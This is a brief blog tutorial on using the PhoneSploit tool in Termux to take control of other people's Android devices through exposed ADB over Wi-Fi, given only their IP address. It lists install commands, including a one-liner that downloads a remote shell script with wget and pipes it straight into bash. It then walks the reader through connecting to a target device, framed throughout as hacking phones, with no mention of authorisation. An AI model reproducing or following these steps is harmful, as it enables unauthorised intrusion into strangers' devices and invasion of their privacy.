ads

How to use PhoneSploit in Android without root

 Hey guys, back again with new tutorial in which I am gonna show you that how you can hack android devices with just IP address with your mobile phone. We will be doing this by using ADB as a exploit. So first, let's see what ADB is.


●What is ADB? 

ADB stands for Android Debug Bridg. It can be defined as a command-line tool which helps to communicate with devices. It is mostly used for debugging purposes but people like hackers, use ADB as a weapon to gain control over targeted devices. Through ADB, you can perform variety of tasks remotely. 

●Tutorial (Steps) :- 

Open Termux app and type the following commands:- 

1. apt update 

2. apt upgrade 

3. apt install git python python2 

4. pip install colorama 

5. git clone https://github.com/Metachar/PhoneSploit 

6. cd PhoneSploit 7. chmod +x * 

8. cd $HOME 

9. apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh 

10. cd PhoneSploit 

11. pip2 install colorama 

12. python2 main_linux.py 

13. Y 

Now you will see PhoneSploit interface on your termux. It must be asking you for a IP address. You have to enter the IP address of android device you want to hack. But remember, device you are gonna hack must have open ports and have enabled ADB over wifi. Otherwise this trick wouldn't work. 

After entering IP address you will see that you are connected to the target devices. The Phonesploit must be showing you many options. You just have to enter the serial number of the option, you want to perform.

Post a Comment

0 Comments